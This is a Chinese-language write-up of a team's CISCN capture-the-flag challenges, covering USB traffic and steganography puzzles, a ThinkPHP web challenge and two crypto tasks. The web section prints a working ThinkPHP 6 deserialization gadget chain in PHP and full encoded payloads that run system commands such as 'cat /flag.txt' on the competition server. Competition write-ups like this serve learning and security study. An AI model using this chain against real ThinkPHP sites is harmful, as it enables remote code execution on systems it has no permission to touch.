前言

参加CISCN的第一年,发现国赛比其他CTF赛事的题目要难好多,但是题目质量蛮高的(除了那三道非预期解的密码学题)。这次战队一共AC了六道题(其中一道为问卷题),全国排名406名,其实对于第一次打国赛的我们来说,已经是很好的结果了~~~,来年继续努力吧!

更新于6月3日:唔!居然晋级了,这是真的没有想到,看来又得要坐一天牢了:P

队友:808, nLesxw,R136a1

Misc

ez_usb

  • 使用 wireshark 搜索 usb.src == “2.10.1” and usb.dst == “host” 只有第三个字节存在变化

筛选第三个

  • 匹配出的结果为 35c535765e50074a,为解压密码

  • 使用上面密码解压压缩包,得到最终结果

everlasting_night

  • 010打开发现异常

    fb3efce4ceac2f5445c7ae17e3e969ab

  • Md5解密

    得到ohhWh04m1

  • hint说与LSB有关

得到 f78dcd383f1b574b

  • 想到 LSB 隐写加密

    得到压缩包,密码为ohhWh04m1,解压缩包得到图片.

    使用010删除文件头,然后使用gmip修改图片宽高比352:287,得到flag

Web

Ezpop

  • 首先题目题提示“thinkphp的最新版,但是却被告知最新版本存在漏洞”,然后看这个题目中的pop就知道是反序列化漏洞构造pop链

  • 浏览这篇文章https://xz.aliyun.com/t/10396

由图我们可以知道,首先漏洞路径在…../index.php/index/xxxxxxxx(在图中这里的xxxx是payload)

这里的传参是‘c’ ,但是我们不知道我们可控的参数是哪个,所以我们需要看这道题目的源码

  • 这里我们用dirsearch去扫扫看

成功发现有一个www.zip的压缩包,下载打开后发现是网站源码

我们就去找我们的可控参数是什么,漏洞路径中的xxxx是什么?

  • 带着问题,去看源码,在\www\app\controller下中的Index.php里,我们发现

    <?php
    namespace app\controller;

    use app\BaseController;

    class Index extends BaseController
    {
    public function index()
    {
    return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:) </h1><p> ThinkPHP V' . \think\facade\App::version() . '<br/><span style="font-size:30px;">14载初心不改 - 你值得信赖的PHP框架</span></p><span style="font-size:25px;">[ V6.0 版本由 <a href="https://www.yisu.com/" target="yisu">亿速云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="ee9b1aa918103c4fc"></think>';
    }

    public function hello($name = 'ThinkPHP6')
    {
    return 'hello,' . $name;
    }
    public function test()
    {
    unserialize($_POST['a']);
    }

    }

    我们能确定,传入的参数名为a,漏洞的路径为http://eci-2ze3qe3v4f3btke7kreo.cloudeci1.ichunqiu.com/index.php/index/test

  • 根据文章构造Payload:

    <?php
    namespace think{
    abstract class Model{
    private $lazySave = false;
    private $data = [];
    private $exists = false;
    protected $table;
    private $withAttr = [];
    protected $json = [];
    protected $jsonAssoc = false;
    function __construct($obj = ''){
    $this->lazySave = True;
    $this->data = ['whoami' => ['ls /']];
    $this->exists = True;
    $this->table = $obj;
    $this->withAttr = ['whoami' => ['system']];
    $this->json = ['whoami',['whoami']];
    $this->jsonAssoc = True;
    }
    }
    }
    namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
    }

    namespace{
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
    }

    a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A4%3A%22ls+%2F%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A4%3A%22ls+%2F%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

  • 发现了flag文件的位置和名字,于是构造最终的Payload:

    a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

Crypto

签到电台

  1. 浏览题目,观察到下面的二维码;

  2. 用微信扫描二维码后可得到提示:在“标准电码表”里寻找“粥时安全到达了”的所对应的7个电码:1732 2514 1344 0356 0451 6671 0055和“密码本”里的前7*4数字:8832 3478 7944 9679 3253 2558 0058。

  3. 之后再次根据题目的提示,把这两串数字采用逐位的“模十算法”(加不进位,减不错位)可得到:9564 5982 8828 9925 3604 8129 0003。

  4. 然后在电台,根据题目要求,输入“s”即用电报机输入“…”来开启电报机,可看到telegraph started.。

  5. 最后利用BP抓,在Repeater里,在“/send?msg=“后输入”9564 5982 8828 9925 3604 8129 0003“并且运行便可得到flag

基于挑战码的双向认证

  1. 首 先 ssh 连 接 , 根 据 题 目 要 求 进 入 cube_challenge/src/login_user 目录下,尝试直接编译 (make)
  2. 然后退回到 cube-challenge 目录下,依次 sh 执行 set_env.shrun_cube.shlogin.shlogin_challenge.sh

最后执行 sh player.sh 即可得 flag